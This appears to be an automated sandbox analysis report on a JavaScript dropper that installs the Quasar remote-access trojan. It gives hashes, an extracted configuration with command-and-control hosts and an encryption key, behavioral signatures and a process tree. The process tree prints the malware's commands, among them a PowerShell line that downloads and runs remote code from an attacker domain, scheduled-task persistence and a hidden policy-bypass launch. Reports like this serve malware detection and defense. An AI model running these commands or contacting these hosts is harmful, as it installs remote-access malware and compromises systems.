Analysis
- max time kernel: 150s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29-05-2023 23:15
Static task: static1
Behavioral task: behavioral1
- Sample: Pagamento.js
- Resource: win7-20230220-en
General
- Target: Pagamento.js
- Size: 169KB
- MD5: c0871f07733a3727e82c64aacda9a85b
- SHA1: bf364b5b56ee65351a0bc5bca249ddeed5705e76
- SHA256: 3eafb742af9d3a8bbbe4bd90b19d175ea4b698505cc5623594d0f13ba883692e
- SHA512: 56f29de9c7b558ad3e24ee52378ce297bccfcc95bdeb74f3ec463493fe25dd2f869f1d74ede8238fe82b9bb11b9f088d47dea1df53f2a0a1b3a7a6c0ad29217e
- SSDEEP: 3072:zbT1AJM/EaZ8ok36/EI4+ZQSU2bokXPXliq3kJIAsKLfbT1AJM/EaZ8ok36/EI4c:zbZ0M/EaZ8ok36RftbokX0bZ0M/EaZ8M
Malware Config
Extracted: https://propagandaetrafego.com/b.jpg
Extracted: https://propagandaetrafego.com/v1.txt
Extracted: quasar
- 2.7.0.0
- OP23
- vhf.sytes.net:4783
- 15.235.109.170:4782
- 2vrOj8wCud9msk5z8w
- encryption_key: ywxbR3BS4B6Rtb7nv9vB
- install_name: Venom.exe
- log_directory: Logs
- reconnect_delay: 3000
- startup_key: Venom Client Startup
Signatures
- Quasar payload (1 IoC)
  resource: behavioral2/memory/5012-172-0x0000000000400000-0x0000000000510000-memory.dmp
  yara_rule: family_quasar
- Blocklisted process makes network request (2 IoCs)
  flow 8, pid 4104, process powershell.exe
  flow 57, pid 3656, process powershell.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation (process wscript.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation (process WScript.exe)
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 59, ioc ip-api.com
- Suspicious use of SetThreadContext (1 IoC)
  PID 3656 set thread context of 5012 (pid 3656, process powershell.exe, target process RegSvcs.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid 4104, process powershell.exe
  pid 4104, process powershell.exe
  pid 3656, process powershell.exe
  pid 3656, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege, pid 4104, process powershell.exe
  Token: SeDebugPrivilege, pid 3656, process powershell.exe
  Token: SeDebugPrivilege, pid 5012, process RegSvcs.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  PID 4972 wrote to memory of 4104 (wscript.exe -> powershell.exe)
  PID 4972 wrote to memory of 4104 (wscript.exe -> powershell.exe)
  PID 4104 wrote to memory of 1772 (powershell.exe -> schtasks.exe)
  PID 4104 wrote to memory of 1772 (powershell.exe -> schtasks.exe)
  PID 1404 wrote to memory of 788 (WScript.exe -> cmd.exe)
  PID 1404 wrote to memory of 788 (WScript.exe -> cmd.exe)
  PID 788 wrote to memory of 4644 (cmd.exe -> cmd.exe)
  PID 788 wrote to memory of 4644 (cmd.exe -> cmd.exe)
  PID 4644 wrote to memory of 3656 (cmd.exe -> powershell.exe)
  PID 4644 wrote to memory of 3656 (cmd.exe -> powershell.exe)
  PID 3656 wrote to memory of 5012 (powershell.exe -> RegSvcs.exe)
  PID 3656 wrote to memory of 5012 (powershell.exe -> RegSvcs.exe)
  PID 3656 wrote to memory of 5012 (powershell.exe -> RegSvcs.exe)
  PID 3656 wrote to memory of 5012 (powershell.exe -> RegSvcs.exe)
  PID 3656 wrote to memory of 5012 (powershell.exe -> RegSvcs.exe)
  PID 3656 wrote to memory of 5012 (powershell.exe -> RegSvcs.exe)
  PID 3656 wrote to memory of 5012 (powershell.exe -> RegSvcs.exe)
  PID 3656 wrote to memory of 5012 (powershell.exe -> RegSvcs.exe)
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (indentation shows the parent/child relationship)
- C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\Pagamento.js
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX (New-Object Net.WebClient).DownloadString.Invoke('https://propagandaetrafego.com/b.jpg')
    Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe
      Command line: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn PDF /tr C:\ProgramData\PDF\PDF.vbs
      Signatures: Creates scheduled task(s)
- C:\Windows\System32\WScript.exe
  Command line: C:\Windows\System32\WScript.exe "C:\ProgramData\PDF\PDF.vbs"
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe
      Command line: CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF.ps1"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF.ps1"
        Signatures: Blocklisted process makes network request; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Signatures: Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\ProgramData\PDF\1.bat
  Filesize: 89B
  MD5: a7f20549327da521bf176b6faa76e623
  SHA1: b9b22202b9d3d43ffa6cbf2f3f81dc7f5b06c605
  SHA256: a2099940d9f7f9a0a603a5a36ef2b24eef49f2cb428539949a6d75261faaba46
  SHA512: 5cac6f996aa1bb4dd11a39d3001da243c6f020bc1a3d86a36ec773d45e479514b006e3b3d8782b1eaab628d0fefdb987495308b9c88f38667f875179771f4823
- C:\ProgramData\PDF\PDF.ps1
  Filesize: 123KB
  MD5: c88e3dee4837866917307a16170ffc48
  SHA1: 52600186a12ba1301d388a3d07a3ac1086c12375
  SHA256: 4662f9bc745e25e9af52df90590449772f8cc5a13c4c4ba13fbe42e7ecc82b73
  SHA512: 0b4edca40b32d9e4105fe79bdeace659253b626d15d6b218c8ea8f0288cacb2feb0644f1ef84a02bc9e402340910a2c2b0d0ee13c5697b1cdddf0c4d0159bea3
- C:\ProgramData\PDF\PDF.vbs
  Filesize: 120B
  MD5: 30e4773314799aa0e1fd7761cae6e609
  SHA1: d1b5a371a7555e99a7602ae6ee8028ac0f0462c4
  SHA256: dc592583d072f325b7a0a54d53499f32ef95c731344cc10400f0bb03e7db4720
  SHA512: fcbeca634cb6fe2d0ea4f726f09b4a35917615467a562e9d73cd235cd337bb797fb6a996f0569e83f4f858c0226b84fbd2d0721bea47d1039e5ffe6ebca0bb8d
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 556084f2c6d459c116a69d6fedcc4105
  SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: ac902dcb52cf1e5b64743d0ed0635dbd
  SHA1: f88a91c878f35374a7f7264de1594f3e1a4492b8
  SHA256: 3b31733ba1fbf536fd9c7c1641dc7b6f956b299838524955d9209f2d33fe5b24
  SHA512: 13fa35c6ff7857ab8051ab4e618e119de197d85b0bf8fa53eae70fe4e12003ff554c63d1618ffee1b19da8183172a37f0f686a9664012e3c1241f0b648bef13e
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_svrs4kc5.xhq.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- memory/3656-171-0x00000215B7370000-0x00000215B7380000-memory.dmp (Filesize: 64KB)
- memory/3656-170-0x00000215B7370000-0x00000215B7380000-memory.dmp (Filesize: 64KB)
- memory/4104-151-0x00000208EC600000-0x00000208EC610000-memory.dmp (Filesize: 64KB)
- memory/4104-152-0x00000208EC600000-0x00000208EC610000-memory.dmp (Filesize: 64KB)
- memory/4104-133-0x00000208EC580000-0x00000208EC5A2000-memory.dmp (Filesize: 136KB)
- memory/4104-150-0x00000208EC600000-0x00000208EC610000-memory.dmp (Filesize: 64KB)
- memory/4104-145-0x00000208EC600000-0x00000208EC610000-memory.dmp (Filesize: 64KB)
- memory/4104-144-0x00000208EC600000-0x00000208EC610000-memory.dmp (Filesize: 64KB)
- memory/4104-143-0x00000208EC600000-0x00000208EC610000-memory.dmp (Filesize: 64KB)
- memory/5012-172-0x0000000000400000-0x0000000000510000-memory.dmp (Filesize: 1.1MB)
- memory/5012-174-0x0000000005540000-0x0000000005AE4000-memory.dmp (Filesize: 5.6MB)
- memory/5012-175-0x00000000050B0000-0x0000000005142000-memory.dmp (Filesize: 584KB)
- memory/5012-176-0x00000000051A0000-0x00000000051B0000-memory.dmp (Filesize: 64KB)
- memory/5012-177-0x00000000052B0000-0x0000000005316000-memory.dmp (Filesize: 408KB)
- memory/5012-178-0x0000000005EB0000-0x0000000005EC2000-memory.dmp (Filesize: 72KB)
- memory/5012-179-0x00000000062E0000-0x000000000631C000-memory.dmp (Filesize: 240KB)
- memory/5012-180-0x0000000006A30000-0x0000000006A3A000-memory.dmp (Filesize: 40KB)
- memory/5012-181-0x00000000051A0000-0x00000000051B0000-memory.dmp (Filesize: 64KB)